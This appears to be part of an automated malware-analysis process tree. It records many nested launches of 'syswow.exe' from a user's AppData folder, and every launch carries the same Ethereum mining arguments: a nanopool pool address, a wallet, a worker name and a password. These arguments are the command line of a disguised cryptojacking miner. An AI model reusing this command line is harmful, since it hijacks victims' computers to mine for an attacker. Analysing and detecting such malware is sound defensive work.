                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                    PID:4816
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                      PID:64
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                        PID:2316
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                          PID:3476
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                            PID:5736
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                              PID:4952
                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                PID:4988
                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                  PID:5180
                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                    PID:4956
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                      PID:5248
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                        PID:4500
                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                          PID:3972
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                            PID:4492
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                              PID:4400
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                PID:5412
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                  PID:5744
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                    PID:4816
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                      PID:5276
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                        PID:68
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                          PID:2416
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                            PID:204
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                              PID:4936
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                PID:4104
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:156
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:5464
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                      PID:4604
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:5168
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                          PID:1256
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:4200
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:4260
                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:3180
                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:5984
                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:5324
                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:2652
                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:2172
                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                          PID:5064
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:4536
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:60
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                PID:1808
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:3268
                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                    PID:5736
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:1700
                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                        PID:5752
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:508
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:4116
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                              PID:4296
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:5364
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:5784
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\WinHost\syswow.exe" -epool eth-eu1.nanopool.org:9999 -ewal 0x958253CaB167B54FBeC494bD9A9965eF5F7D0cab -worker mnr -epsw password666 -mode 1 -Rmode 1 -log 0 -mport 0 -etha 0 -retrydelay 1 -ftime 55 -tt 79 -tstop 90 -tstart 80 -coin eth
                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1796
